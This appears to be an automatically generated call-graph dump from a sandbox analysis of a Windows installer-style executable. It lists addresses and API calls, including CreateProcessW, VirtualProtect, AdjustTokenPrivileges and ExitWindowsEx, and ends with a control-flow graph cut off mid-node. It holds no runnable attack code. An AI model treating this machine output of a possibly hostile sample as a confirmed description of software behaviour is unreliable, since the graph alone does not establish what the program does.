lstrcpyW 2926->2927 2928 733f1f2b wsprintfW 2926->2928 2930 733f1765 2927->2930 2928->2930 2930->2836 2932 733f17a4 2931->2932 2933 733f201c 2931->2933 2932->2845 2932->2846 2933->2932 2934 733f2033 GlobalFree 2933->2934 2934->2933 2936 733f15eb 2 API calls 2935->2936 2937 733f15e6 2936->2937 2937->2839 2938->2850 2939->2872 2940->2872 2948 733f12f8 GlobalAlloc 2941->2948 2943 733f12f0 lstrcpynW 2943->2872 2945 733f1327 2944->2945 2945->2875 2946->2869 2947->2870 2948->2943 2950 733f12f8 GlobalAlloc 2949->2950 2951 733f1555 2949->2951 2950->2879 2952 733f12e1 2 API calls 2951->2952 2953 733f156a 2952->2953 2953->2879 2955 733f19ea VirtualAlloc 2954->2955 2956 733f1a48 2954->2956 2955->2956 2956->2879 2958 733f2ccd GetLastError 2957->2958 2959 733f2cd8 2957->2959 2958->2959 2959->2832 2960->2915 2962 733f163f 2961->2962 2963 733f1663 2961->2963 2962->2963 2964 733f1648 lstrcpyW 2962->2964 2963->2915 2964->2963 2965->2920 3285 733f103a 3286 733f1052 3285->3286 3287 733f10c5 3286->3287 3288 733f1081 3286->3288 3289 733f1061 3286->3289 3291 733f156c GlobalFree 3288->3291 3301 733f156c 3289->3301 3298 733f1079 3291->3298 3292 733f1072 3293 733f156c GlobalFree 3292->3293 3293->3298 3294 733f1091 GlobalSize 3295 733f109a 3294->3295 3296 733f109e GlobalAlloc 3295->3296 3297 733f10af 3295->3297 3299 733f15c5 3 API calls 3296->3299 3300 733f10b8 GlobalFree 3297->3300 3298->3294 3298->3295 3299->3297 3300->3287 3303 733f1572 3301->3303 3302 733f1578 3302->3292 3303->3302 3304 733f1584 GlobalFree 3303->3304 3304->3292 3368 40362d 3369 403653 3368->3369 3370 40363f SetTimer 3368->3370 3371 40365c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3369->3371 3372 4036aa 3369->3372 3370->3371 3371->3372 2413 404f70 2414 405111 2413->2414 2415 404f8f 2413->2415 2417 405125 GetDlgItem GetDlgItem 2414->2417 2418 40515e 2414->2418 2415->2414 2416 404f9b 2415->2416 2419 404fa0 SetWindowPos 2416->2419 2420 404fba 2416->2420 2421 4054f8 18 API calls 2417->2421 2422 4051b5 2418->2422 2428 401399 90 API calls 2418->2428 2423 4050fd 2419->2423 2424 40500d 2420->2424 2425 404fbf ShowWindow 2420->2425 2427 405148 SetClassLongW 2421->2427 2439 40510c 2422->2439 2484 4054c6 2422->2484 2523 405739 2423->2523 2430 405015 DestroyWindow 2424->2430 2431 40502f 2424->2431 2425->2423 2429 404fe4 GetWindowLongW 2425->2429 2432 401533 90 API calls 2427->2432 2433 40518e 2428->2433 2429->2423 2435 405000 ShowWindow 2429->2435 2441 405446 2430->2441 2436 405034 SetWindowLongW 2431->2436 2437 405047 2431->2437 2432->2418 2433->2422 2438 405192 SendMessageW 2433->2438 2435->2423 2436->2439 2437->2423 2443 405053 GetDlgItem 2437->2443 2438->2439 2440 401533 90 API calls 2453 4051c7 2440->2453 2441->2439 2444 405479 ShowWindow 2441->2444 2442 405448 DestroyWindow EndDialog 2442->2441 2445 405092 2443->2445 2446 40506f SendMessageW IsWindowEnabled 2443->2446 2444->2439 2449 4050a1 2445->2449 2451 4050e4 SendMessageW 2445->2451 2452 4050b3 2445->2452 2460 405099 2445->2460 2446->2439 2448 40508e 2446->2448 2448->2445 2449->2451 2449->2460 2451->2423 2455 4050ca 2452->2455 2456 4050bc 2452->2456 2453->2439 2453->2440 2453->2442 2457 4054f8 18 API calls 2453->2457 2475 405388 DestroyWindow 2453->2475 2487 405e98 2453->2487 2504 4054f8 2453->2504 2454 4050e2 2454->2423 2459 401533 90 API calls 2455->2459 2517 401533 2456->2517 2457->2453 2461 4050d1 2459->2461 2520 405936 2460->2520 2461->2423 2461->2460 2463 40524b GetDlgItem 2464 405272 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 2463->2464 2469 405266 2463->2469 2464->2469 2465 4052c7 GetSystemMenu EnableMenuItem SendMessageW 2466 4052f4 SendMessageW 2465->2466 2465->2469 2466->2469 2469->2464 2469->2465 2507 4054e1 SendMessageW 2469->2507 2508 405cf9 2469->2508 2511 406af8 lstrcpynW 2469->2511 2471 405326 lstrlenW 2472 405e98 17 API calls 2471->2472 2473 405340 SetWindowTextW 2472->2473 2512 401399 2473->2512 2475->2441 2476 4053a2 CreateDialogParamW 2475->2476 2476->2441 2477 4053d5 2476->2477 2478 4054f8 18 API calls 2477->2478 2479 4053e0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2478->2479 2480 401399 90 API calls 2479->2480 2481 405426 2480->2481 2481->2439 2482 40542e ShowWindow 2481->2482 2483 4054c6 SendMessageW 2482->2483 2483->2441 2485 4054de 2484->2485 2486 4054cf SendMessageW 2484->2486 2485->2453 2486->2485 2498 405ea3 2487->2498 2488 4060dc 2489 4060f1 2488->2489 2544 406af8 lstrcpynW 2488->2544 2489->2453 2492 4060a7 lstrlenW 2492->2498 2493 405fbc GetSystemDirectoryW 2493->2498 2494 405fcf GetWindowsDirectoryW 2494->2498 2497 405e98 10 API calls 2497->2492 2498->2488 2498->2492 2498->2493 2498->2494 2498->2497 2499 405ffc SHGetSpecialFolderLocation 2498->2499 2501 405e98 10 API calls 2498->2501 2502 406d1b CharNextW CharNextW CharNextW CharNextW CharPrevW 2498->2502 2503 406048 lstrcatW 2498->2503 2537 406955 2498->2537 2542 4065fd wsprintfW 2498->2542 2543 406af8 lstrcpynW 2498->2543 2499->2498 2500 406014 SHGetPathFromIDListW CoTaskMemFree 2499->2500 2500->2498 2501->2498 2502->2498 2503->2498 2505 405e98 17 API calls 2504->2505 2506 405503 SetDlgItemTextW 2505->2506 2506->2463 2507->2469 2509 405e98 17 API calls 2508->2509 2510 405d07 SetWindowTextW 2509->2510 2510->2469 2511->2471 2513 401413 2512->2513 2515 4013a3 2512->2515 2513->2453 2515->2513 2516 4013df MulDiv SendMessageW 2515->2516 2549 40154a 2515->2549 2516->2515 2518 401399 90 API calls 2517->2518 2519 401547 2518->2519 2519->2460 2521 405943 SendMessageW 2520->2521 2522 40593d 2520->2522 2521->2454 2522->2521 2524 405751 GetWindowLongW 2523->2524 2534 405807 2523->2534 2525 405766 2524->2525 2524->2534 2526 40579a 2525->2526 2527 40578e GetSysColor 2525->2527 2525->2534 2528 4057a8 SetBkMode 2526->2528 2529 40579e SetTextColor 2526->2529 2527->2526 2530 4057d0 2528->2530 2531 4057c1 GetSysColor 2528->2531 2529->2528 2532 4057e1 2530->2532 2533 4057d4 SetBkColor 2530->2533 2531->2530 2532->2534 2535 4057f1 DeleteObject 2532->2535 2536 4057fa CreateBrushIndirect 2532->2536 2533->2532 2534->2439 2535->2536 2536->2534 2545 4062b6 2537->2545 2540 4069bb 2540->2498 2541 40698a RegQueryValueExW RegCloseKey 2541->2540 2542->2498 2543->2498 2544->2489 2546 4062c5 2545->2546 2547 4062c9 2546->2547 2548 4062ce RegOpenKeyExW 2546->2548 2547->2540 2547->2541 2548->2547 2550 4015c3 2549->2550 2601 4015ce 2549->2601 2551 4016c1 2550->2551 2552 4017c2 2550->2552 2553 4015e6 2550->2553 2554 4018cb 2550->2554 2555 40160c 2550->2555 2556 4016ef 2550->2556 2557 4016af 2550->2557 2558 40182f 2550->2558 2559 401711 2550->2559 2560 401633 SetForegroundWindow 2550->2560 2561 4017d3 2550->2561 2562 4015d5 2550->2562 2563 401618 2550->2563 2564 4015f9 2550->2564 2565 40189b 2550->2565 2566 4018de 2550->2566 2567 40163f 2550->2567 2550->2601 2568 4016d1 ShowWindow 2551->2568 2569 4016d9 2551->2569 2572 40303e 17 API calls 2552->2572 2571 4015f0 PostQuitMessage 2553->2571 2553->2601 2576 40303e 17 API calls 2554->2576 2587 405d18 24 API calls 2555->2587 2663 40303e 2556->2663 2732 4065fd wsprintfW 2557->2732 2579 40303e 17 API calls 2558->2579 2573 40303e 17 API calls 2559->2573 2560->2601 2575 40303e 17 API calls 2561->2575 2582 405d18 24 API calls 2562->2582 2562->2601 2660 403002 2563->2660 2594 401399 73 API calls 2564->2594 2574 40303e 17 API calls 2565->2574 2578 40303e 17 API calls 2566->2578 2598 403002 17 API calls 2567->2598 2567->2601 2568->2569 2581 4016e6 ShowWindow 2569->2581 2569->2601 2571->2601 2584 4017c8 2572->2584 2585 401718 2573->2585 2586 4018a2 SearchPathW 2574->2586 2588 4017da 2575->2588 2589 4018d2 2576->2589 2591 4018e5 2578->2591 2592 401835 GetFullPathNameW 2579->2592 2581->2601 2582->2601 2736 4065ad FindFirstFileW 2584->2736 2668 406ba3 CharNextW CharNextW 2585->2668 2586->2601 2587->2601 2596 40303e 17 API calls 2588->2596 2698 406a34 2589->2698 2590 40161e Sleep 2590->2601 2606 401906 2591->2606 2607 40190e 2591->2607 2599 401857 2592->2599 2600 40184d 2592->2600 2594->2601 2602 4017e3 2596->2602 2598->2601 2599->2600 2609 4065ad 2 API calls 2599->2609 2600->2601 2603 401889 GetShortPathNameW 2600->2603 2601->2515 2605 40303e 17 API calls 2602->2605 2603->2601 2604 401780 2604->2555 2608 401790 2604->2608 2611 4017ec MoveFileW 2605->2611 2744 406af8 lstrcpynW 2606->2744 2745 406af8 lstrcpynW 2607->2745 2686 405d18 2608->2686 2615 40186a 2609->2615 2611->2555 2616 401804 2611->2616 2615->2600 2743 406af8 lstrcpynW 2615->2743 2616->2601 2624 4065ad 2 API calls 2616->2624 2617 40190c 2702 406d1b 2617->2702 2618 401919 2746 406534 lstrlenW CharPrevW 2618->2746 2629 401814 2624->2629 2627 4017a2 SetCurrentDirectoryW 2627->2601 2629->2601 2739 40621b MoveFileExW 2629->2739 2630 401720 2630->2604 2632 401769 GetFileAttributesW 2630->2632 2674 4065d4 2630->2674 2678 4064da 2630->2678 2681 405e1c CreateDirectoryW 2630->2681 2733 405dfc CreateDirectoryW 2630->2733 2632->2630 2633 4065ad 2 API calls 2641 40192b 2633->2641 2634 401968 2749 406b7b GetFileAttributesW 2634->2749 2638 40193f CompareFileTime 2638->2641 2639 401a18 2640 405d18 24 API calls 2639->2640 2643 401a24 2640->2643 2641->2562 2641->2633 2641->2634 2641->2638 2641->2639 2642 4019fd 2641->2642 2647 406af8 lstrcpynW 2641->2647 2650 405e98 17 API calls 2641->2650 2711 4068f9 GetFileAttributesW CreateFileW 2641->2711 2752 406a86 2641->2752 2644 405d18 24 API calls 2642->2644 2712 403148 2643->2712 2644->2601 2647->2641 2648 401a52 SetFileTime 2649 401a60 CloseHandle 2648->2649 2649->2601 2651 401a73 2649->2651 2650->2641 2652 401a78 2651->2652 2653 401a89 2651->2653 2654 405e98 17 API calls 2652->2654 2655 405e98 17 API calls 2653->2655 2656 401a80 lstrcatW 2654->2656 2657 401a91 2655->2657 2656->2657 2659 406a86 MessageBoxIndirectW 2657->2659 2659->2601 2661 405e98 17 API calls 2660->2661 2662 403016 2661->2662 2662->2590 2664 405e98 17 API calls 2663->2664 2665 403067 2664->2665 2666 4016f6 SetFileAttributesW 2665->2666 2667 406d1b 5 API calls 2665->2667 2666->2601 2667->2666 2669 406bc1 2668->2669 2673 406bf8 2668->2673 2670 406bd0 CharNextW 2669->2670 2672 406bd5 2669->2672 2670->2673 2671 4065d4 CharNextW 2671->2672 2672->2671 2672->2673 2673->2630 2675 4065e0 2674->2675 2676 4065fa 2674->2676 2675->2676 2677 4065e9 CharNextW 2675->2677 2676->2630 2677->2675 2677->2676 2756 4068c4 GetModuleHandleA 2678->2756 2682 405e67 GetLastError 2681->2682 2683 405e8a 2681->2683 2682->2683 2684 405e74 SetFileSecurityW 2682->2684 2683->2630 2684->2683 2685 405e8e GetLastError 2684->2685 2685->2683 2687 405d2a 2686->2687 2693 401797 2686->2693 2688 405d49 lstrlenW 2687->2688 2689 405e98 17 API calls 2687->2689 2690 405d5b lstrlenW 2688->2690 2691 405d7e 2688->2691 2689->2688 2692 405d70 lstrcatW 2690->2692 2690->2693 2694 405d95 2691->2694 2695 405d88 SetWindowTextW 2691->2695 2692->2691 2697 406af8 lstrcpynW 2693->2697 2694->2693 2696 405d9a SendMessageW SendMessageW SendMessageW 2694->2696 2695->2694 2696->2693 2697->2627 2699 406a41 GetTickCount GetTempFileNameW 2698->2699 2700 406a75 2699->2700 2701 406a79 2699->2701 2700->2699 2700->2701 2701->2601 2709 406d30 2702->2709 2703 406db2 2704 406dba CharPrevW 2703->2704 2706 406dda 2703->2706 2704->2703 2705 406da3 CharNextW 2705->2703 2705->2709 2706->2641 2707 4065d4 CharNextW 2707->2709 2708 406d8f CharNextW 2708->2709 2709->2703 2709->2705 2709->2707 2709->2708 2710 406d9e CharNextW 2709->2710 2710->2705 2711->2641 2713 403190 2712->2713 2714 403183 2712->2714 2765 406926 ReadFile 2713->2765 2772 403131 SetFilePointer 2714->2772 2718 4031b6 GetTickCount 2720 4031e6 2718->2720 2727 401a3a 2718->2727 2719 4032f9 2721 403340 2719->2721 2725 4032fd 2719->2725 2720->2727 2728 40323d GetTickCount 2720->2728 2729 40326e MulDiv wsprintfW 2720->2729 2767 40311b 2720->2767 2770 4069e9 WriteFile 2720->2770 2723 40311b ReadFile 2721->2723 2723->2727 2724 40311b ReadFile 2724->2725 2725->2724 2726 4069e9 WriteFile 2725->2726 2725->2727 2726->2725 2727->2648 2727->2649 2728->2720 2730 405d18 24 API calls 2729->2730 2730->2720 2732->2601 2734 405e16 2733->2734 2735 405e0e GetLastError 2733->2735 2734->2630 2735->2734 2737 4065c3 FindClose 2736->2737 2738 4065ce 2736->2738 2737->2738 2738->2601 2740 40623c 2739->2740 2741 40622f 2739->2741 2740->2555 2773 4062e4 2741->2773 2743->2600 2744->2617 2745->2618 2747 406551 lstrcatW 2746->2747 2748 40191f lstrcatW 2746->2748 2747->2748 2748->2617 2750 406b9d 2749->2750 2751 406b8d SetFileAttributesW 2749->2751 2750->2641 2751->2750 2755 406a9b 2752->2755 2753 406ae9 2753->2641 2754 406ab1 MessageBoxIndirectW 2754->2753 2755->2753 2755->2754 2757 4068e6 GetProcAddress 2756->2757 2758 4068dc 2756->2758 2760 4064e1 2757->2760 2762 40617c GetSystemDirectoryW 2758->2762 2760->2630 2761 4068e2 2761->2757 2761->2760 2763 40619e wsprintfW LoadLibraryExW 2762->2763 2763->2761 2766 4031a2 2765->2766 2766->2718 2766->2719 2766->2727 2768 406926 ReadFile 2767->2768 2769 40312e 2768->2769 2769->2720 2771 406a0a 2770->2771 2771->2720 2772->2713 2774 406314 2773->2774 2775 40633a GetShortPathNameW 2773->2775 2800 4068f9 GetFileAttributesW CreateFileW 2774->2800 2777 40641a 2775->2777 2778 40634f 2775->2778 2777->2740 2778->2777 2780 406357 wsprintfA 2778->2780 2779 40631e CloseHandle GetShortPathNameW 2779->2777 2781 406332 2779->2781 2782 405e98 17 API calls 2780->2782 2781->2775 2781->2777 2783 406380 2782->2783 2801 4068f9 GetFileAttributesW CreateFileW 2783->2801 2785 40638d 2785->2777 2786 406398 GetFileSize GlobalAlloc 2785->2786 2787 406413 CloseHandle 2786->2787 2788 4063b7 2786->2788 2787->2777 2789 406926 ReadFile 2788->2789 2790 4063bf 2789->2790 2790->2787 2802 406b14 lstrlenA lstrlenA 2790->2802 2793 4063d2 lstrcpyA 2796 4063e4 2793->2796 2794 40641f 2795 406b14 3 API calls 2794->2795 2795->2796 2797 4063f5 SetFilePointer 2796->2797 2798 4069e9 WriteFile 2797->2798 2799 40640c GlobalFree 2798->2799 2799->2787 2800->2779 2801->2785 2803 406b33 2802->2803 2804 4063ce 2802->2804 2803->2804 2805 406b60 lstrlenA 2803->2805 2804->2793 2804->2794 2805->2803 2805->2804 2966 733f1a4a 2967 733f1a5a VirtualProtect 2966->2967 2968 733f1aa1 2966->2968 2967->2968 3305 733f1b0a 3306 733f1b38 3305->3306 3307 733f2351 21 API calls 3306->3307 3308 733f1b3f 3307->3308 3309 733f1b46 3308->3309 3310 733f1b52 3308->3310 3311 733f15eb 2 API calls 3309->3311 3312 733f1b5c 3310->3312 3313 733f1b73 3310->3313 3316 733f1b50 3311->3316 3317 733f15c5 3 API calls 3312->3317 3314 733f1b9f 3313->3314 3315 733f1b79 3313->3315 3320 733f15c5 3 API calls 3314->3320 3319 733f1668 3 API calls 3315->3319 3318 733f1b61 3317->3318 3321 733f1668 3 API calls 3318->3321 3322 733f1b7e 3319->3322 3320->3316 3323 733f1b67 3321->3323 3324 733f15eb 2 API calls 3322->3324 3325 733f15eb 2 API calls 3323->3325 3326 733f1b84 GlobalFree 3324->3326 3327 733f1b6d GlobalFree 3325->3327 3326->3316 3326->3327 3329 733f2c6a 3330 733f2cd8 3329->3330 3331 733f2cc3 3329->3331 3331->3330 3332 733f2ccd GetLastError 3331->3332 3332->3330 3333 733f1aa7 3334 733f156c GlobalFree 3333->3334 3337 733f1abf 3334->3337 3335 733f1b01 GlobalFree 3336 733f1add 3336->3335 3337->3335 3337->3336 3338 733f1aed VirtualFree 3337->3338 3338->3335 3339 733f10c7 3341 733f10f8 3339->3341 3340 733f12be GlobalFree 3341->3340 3342 733f1258 GlobalFree 3341->3342 3343 733f11d7 GlobalAlloc 3341->3343 3344 733f1548 3 API calls 3341->3344 3345 733f12ba 3341->3345 3346 733f1296 GlobalFree 3341->3346 3347 733f15eb 2 API calls 3341->3347 3348 733f1638 lstrcpyW 3341->3348 3350 733f1165 GlobalAlloc 3341->3350 3342->3341 3343->3341 3344->3341 3345->3340 3346->3341 3349 733f11ca GlobalFree 3347->3349 3351 733f11ab GlobalFree 3348->3351 3349->3341 3350->3341 3351->3341 3352 733f1cc7 3353 733f1cee 3352->3353 3354 733f1d2f GlobalFree 3353->3354 3355 733f1d4e __alldvrm 3353->3355 3354->3355 3356 733f15eb 2 API calls 3355->3356 3357 733f1de5 GlobalFree GlobalFree 3356->3357 3358 733f12c6 3361 733f101b 3358->3361 3362 733f156c GlobalFree 3361->3362 3363 733f1020 3362->3363 3364 733f1024 GlobalAlloc 3363->3364 3365 733f1032 3363->3365 3364->3365 3366 733f15c5 3 API calls 3365->3366 3367 733f1038 3366->3367 2969 4036da SetErrorMode GetVersionExW 2970 403725 GetVersionExW 2969->2970 2972 40375c 2969->2972 2971 403747 2970->2971 2971->2972 2973 4037c3 2972->2973 2974 4068c4 5 API calls 2972->2974 2975 40617c 3 API calls 2973->2975 2974->2973 2976 4037d9 lstrlenA 2975->2976 2976->2973 2977 4037e7 2976->2977 2978 4068c4 5 API calls 2977->2978 2979 4037ee 2978->2979 2980 4068c4 5 API calls 2979->2980 2981 4037f5 2980->2981 2982 4068c4 5 API calls 2981->2982 2983 403801 #17 OleInitialize SHGetFileInfoW 2982->2983 3059 406af8 lstrcpynW 2983->3059 2986 40384f GetCommandLineW 3060 406af8 lstrcpynW 2986->3060 2988 403860 2989 4065d4 CharNextW 2988->2989 2990 40389a CharNextW 2989->2990 2991 403988 GetTempPathW 2990->2991 3001 4038b3 2990->3001 3061 403c83 2991->3061 2993 4039a0 2994 4039a4 GetWindowsDirectoryW lstrcatW 2993->2994 2995 4039fa DeleteFileW 2993->2995 2996 403c83 12 API calls 2994->2996 3071 4033cb GetTickCount GetModuleFileNameW 2995->3071 2998 4039c0 2996->2998 2998->2995 3002 4039c4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2998->3002 2999 4065d4 CharNextW 2999->3001 3000 403a0d 3003 403a90 3000->3003 3005 403a82 3000->3005 3009 4065d4 CharNextW 3000->3009 3001->2991 3001->2999 3008 403974 3001->3008 3004 403c83 12 API calls 3002->3004 3178 4036b0 3003->3178 3007 4039f2 3004->3007 3099 405a1c 3005->3099 3007->2995 3007->3003 3160 406af8 lstrcpynW 3008->3160 3023 403a2c 3009->3023 3013 403bd7 3015 406a86 MessageBoxIndirectW 3013->3015 3014 403bea 3016 403bf3 GetCurrentProcess OpenProcessToken 3014->3016 3017 403be2 ExitProcess 3014->3017 3015->3017 3021 403c0b LookupPrivilegeValueW AdjustTokenPrivileges 3016->3021 3022 403c3f 3016->3022 3018 403a56 3161 406616 3018->3161 3019 403a97 3026 4064da 5 API calls 3019->3026 3021->3022 3025 4068c4 5 API calls 3022->3025 3023->3018 3023->3019 3028 403c46 3025->3028 3029 403a9c lstrcatW 3026->3029 3030 403c5b ExitWindowsEx 3028->3030 3033 403c68 3028->3033 3031 403ac0 lstrcatW lstrcmpiW 3029->3031 3032 403ab1 lstrcatW 3029->3032 3030->3017 3030->3033 3031->3003 3034 403ae7 3031->3034 3032->3031 3036 401533 90 API calls 3033->3036 3037 403af0 3034->3037 3038 403af7 3034->3038 3036->3017 3040 405e1c 4 API calls 3037->3040 3041 405dfc 2 API calls 3038->3041 3039 403a77 3176 406af8 lstrcpynW 3039->3176 3043 403af5 3040->3043 3044 403afc SetCurrentDirectoryW 3041->3044 3043->3044 3045 403b10 3044->3045 3046 403b1f 3044->3046 3177 406af8 lstrcpynW 3045->3177 3156 406af8 lstrcpynW 3046->3156 3049 405e98 17 API calls 3050 403b4f DeleteFileW 3049->3050 3051 403b5a CopyFileW 3050->3051 3056 403b2d 3050->3056 3051->3056 3052 403bb3 3054 40621b 35 API calls 3052->3054 3053 40621b 35 API calls 3053->3056 3054->3003 3055 405e98 17 API calls 3055->3056 3056->3049 3056->3052 3056->3053 3056->3055 3058 403b9e CloseHandle 3056->3058 3157 4066b4 CreateProcessW 3056->3157 3058->3056 3059->2986 3060->2988 3062 406d1b 5 API calls 3061->3062 3064 403c8f 3062->3064 3063 403c99 3063->2993 3064->3063 3065 406534 3 API calls 3064->3065 3066 403ca1 3065->3066 3067 405dfc 2 API calls 3066->3067 3068 403ca7 3067->3068 3069 406a34 2 API calls 3068->3069 3070 403cb2 3069->3070 3070->2993 3185 4068f9 GetFileAttributesW CreateFileW 3071->3185 3073 40340d 3092 40341a 3073->3092 3186 406af8 lstrcpynW 3073->3186 3075 403430 3187 406cee lstrlenW 3075->3187 3079 403441 GetFileSize 3080 403548 3079->3080 3081 40345a 3079->3081 3192 403367 3080->3192 3081->3080 3084 40311b ReadFile 3081->3084 3085 403616 3081->3085 3081->3092 3095 403367 6 API calls 3081->3095 3083 403557 3086 403598 GlobalAlloc 3083->3086 3083->3092 3203 403131 SetFilePointer 3083->3203 3084->3081 3089 403367 6 API calls 3085->3089 3204 403131 SetFilePointer 3086->3204 3089->3092 3090 4035b5 3093 403148 31 API calls 3090->3093 3091 403574 3094 406926 ReadFile 3091->3094 3092->3000 3097 4035c4 3093->3097 3096 403586 3094->3096 3095->3081 3096->3086 3096->3092 3097->3092 3098 4035f4 SetFilePointer 3097->3098 3098->3092 3100 4068c4 5 API calls 3099->3100 3101 405a30 3100->3101 3102 405a39 3101->3102 3103 405a4b 3101->3103 3217 4065fd wsprintfW 3102->3217 3104 406955 3 API calls 3103->3104 3105 405a7a 3104->3105 3107 405a99 lstrcatW 3105->3107 3109 406955 3 API calls 3105->3109 3108 405a49 3107->3108 3209 40595d 3108->3209 3109->3107 3112 406616 18 API calls 3113 405acb 3112->3113 3114 405b65 3113->3114 3116 406955 3 API calls 3113->3116 3115 406616 18 API calls 3114->3115 3117 405b6b 3115->3117 3118 405afe 3116->3118 3119 405b7b LoadImageW 3117->3119 3120 405e98 17 API calls 3117->3120 3118->3114 3124 405b22 lstrlenW 3118->3124 3127 4065d4 CharNextW 3118->3127 3121 405c28 3119->3121 3122 405bab RegisterClassW 3119->3122 3120->3119 3123 401533 90 API calls 3121->3123 3125 405bdf SystemParametersInfoW CreateWindowExW 3122->3125 3155 405bd8 3122->3155 3126 405c2e 3123->3126 3128 405b32 lstrcmpiW 3124->3128 3129 405b58 3124->3129 3125->3121 3134 40595d 18 API calls 3126->3134 3126->3155 3131 405b1d 3127->3131 3128->3129 3132 405b42 GetFileAttributesW 3128->3132 3130 406534 3 API calls 3129->3130 3135 405b5e 3130->3135 3131->3124 3133 405b4e 3132->3133 3133->3129 3136 406cee 2 API calls 3133->3136 3137 405c3b 3134->3137 3218 406af8 lstrcpynW 3135->3218 3136->3129 3139 405c47 ShowWindow 3137->3139 3140 405cc9 3137->3140 3142 40617c 3 API calls 3139->3142 3219 405842 OleInitialize 3140->3219 3144 405c5f 3142->3144 3143 405ccf 3145 405cd3 3143->3145 3146 405ced 3143->3146 3147 405c6d GetClassInfoW 3144->3147 3148 40617c 3 API calls 3144->3148 3152 401533 90 API calls 3145->3152 3145->3155 3149 401533 90 API calls 3146->3149 3150 405c80 GetClassInfoW RegisterClassW 3147->3150 3151 405c96 DialogBoxParamW 3147->3151 3148->3147 3153 405cf4 3149->3153 3150->3151 3154 401533 90 API calls 3151->3154 3152->3155 3153->3153 3154->3155 3155->3003 3156->3056 3158 4066f3 3157->3158 3159 4066e7 CloseHandle 3157->3159 3158->3056 3159->3158 3160->2991 3227 406af8 lstrcpynW 3161->3227 3163 406627 3164 406ba3 4 API calls 3163->3164 3165 40662d 3164->3165 3166 406d1b 5 API calls 3165->3166 3167 403a64 3165->3167 3173 406639 3166->3173 3167->3003 3175 406af8 lstrcpynW 3167->3175 3168 406669 lstrlenW 3169 406675 3168->3169 3168->3173 3171 406534 3 API calls 3169->3171 3170 4065ad 2 API calls 3170->3173 3172 40667a GetFileAttributesW 3171->3172 3172->3167 3173->3167 3173->3168 3173->3170 3174 406cee 2 API calls 3173->3174 3174->3168 3175->3039 3176->3005 3177->3046 3179 4036c8 3178->3179 3180 4036ba CloseHandle 3178->3180 3228 403cf1 3179->3228 3180->3179 3185->3073 3186->3075 3188 406cfd 3187->3188 3189 406d03 CharPrevW 3188->3189 3190 403436 3188->3190 3189->3188 3189->3190 3191 406af8 lstrcpynW 3190->3191 3191->3079 3193 403386 3192->3193 3194 40336e 3192->3194 3197 403397 GetTickCount 3193->3197 3198 40338f 3193->3198 3195 403377 DestroyWindow 3194->3195 3196 40337e 3194->3196 3195->3196 3196->3083 3200 4033a5 CreateDialogParamW ShowWindow 3197->3200 3201 4033ca 3197->3201 3205 4061ed 3198->3205 3200->3201 3201->3083 3203->3091 3204->3090 3206 4061ff PeekMessageW 3205->3206 3207 4061f5 DispatchMessageW 3206->3207 3208 403396 3206->3208 3207->3206 3208->3083 3210 405970 3209->3210 3226 4065fd wsprintfW 3210->3226 3212 4059e9 3213 405cf9 18 API calls 3212->3213 3214 4059ee 3213->3214 3215 405a17 3214->3215 3216 405e98 17 API calls 3214->3216 3215->3112 3216->3214 3217->3108 3218->3114 3220 4054c6 SendMessageW 3219->3220 3223 405865 3220->3223 3221 40588c 3222 4054c6 SendMessageW 3221->3222 3224 40589e OleUninitialize 3222->3224 3223->3221 3225 401399 90 API calls 3223->3225 3224->3143 3225->3223 3226->3212 3227->3163 3229 403cff 3228->3229 3230 4036cd 3229->3230 3231 403d04 FreeLibrary GlobalFree 3229->3231 3232 4066f7 3230->3232 3231->3230 3231->3231 3233 406616 18 API calls 3232->3233 3234 406719 3233->3234 3235 406722 DeleteFileW 3234->3235 3236 406739 3234->3236 3237 4036d9 OleUninitialize 3235->3237 3236->3237 3239 406859 3236->3239 3271 406af8 lstrcpynW 3236->3271 3237->3013 3237->3014 3239->3237 3243 4065ad 2 API calls 3239->3243 3240 406761 3241 406779 3240->3241 3242 40676b lstrcatW 3240->3242 3245 406cee 2 API calls 3241->3245 3244 40677f 3242->3244 3246 406876 3243->3246 3248 406790 lstrcatW 3244->3248 3249 406798 lstrlenW FindFirstFileW 3244->3249 3245->3244 3246->3237 3247 40687a 3246->3247 3250 406534 3 API calls 3247->3250 3248->3249 3249->3239 3251 4067c1 3249->3251 3252 406880 3250->3252 3255 40683b FindNextFileW 3251->3255 3265 4066f7 59 API calls 3251->3265 3267 406807 3251->3267 3272 406af8 lstrcpynW 3251->3272 3253 406563 5 API calls 3252->3253 3254 40688c 3253->3254 3256 406890 3254->3256 3257 4068af 3254->3257 3255->3251 3259 406852 FindClose 3255->3259 3256->3237 3261 405d18 24 API calls 3256->3261 3260 405d18 24 API calls 3257->3260 3259->3239 3260->3237 3262 40689c 3261->3262 3264 40621b 35 API calls 3262->3264 3266 4068a5 3264->3266 3265->3267 3266->3237 3267->3255 3268 405d18 24 API calls 3267->3268 3269 405d18 24 API calls 3267->3269 3270 40621b 35 API calls 3267->3270 3273 406563 3267->3273 3268->3255 3269->3267 3270->3267 3271->3240 3272->3251 3274 406b7b 2 API calls 3273->3274 3275 40656f 3274->3275 3276 406591 3275->3276 3277 406587 DeleteFileW 3275->3277 3278 40657f RemoveDirectoryW 3275->3278 3276->3267 3279 40658d 3277->3279 3278->3279 3279->3276 3280 40659c SetFileAttributesW 3279->3280 3280->3276 3373 733f1000 3374 733f101b 5 API calls 3373->3374 3375 733f1019 3374->3375

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 4036da-403723 SetErrorMode GetVersionExW 1 403725-403745 GetVersionExW 0->1 2 40375c 0->2 3 403747-40374b 1->3 4 403758-40375a 1->4 5 403763-403768 2->5 6 40374e-403756 3->6 4->6 7 403775 5->7 8 40376a-403773 5->8 6->5 9 403779-4037bb 7->9 8->9 10 4037bd-4037c5 call 4068c4 9->10 11 4037ce 9->11 10->11 17 4037c7 10->17 13 4037d3-4037e5 call 40617c lstrlenA 11->13 18 4037e7-403803 call 4068c4 * 3 13->18 17->11 25 403814-4038ad #17 OleInitialize SHGetFileInfoW call 406af8 GetCommandLineW call 406af8 call 4065d4 CharNextW 18->25 26 403805-40380b 18->26 35 4038b3 25->35 36 403988-4039a2 GetTempPathW call 403c83 25->36 26->25 30 40380d 26->30 30->25 37 4038b5-4038bb 35->37 44 4039a4-4039c2 GetWindowsDirectoryW lstrcatW call 403c83 36->44 45 4039fa-403a13 DeleteFileW call 4033cb 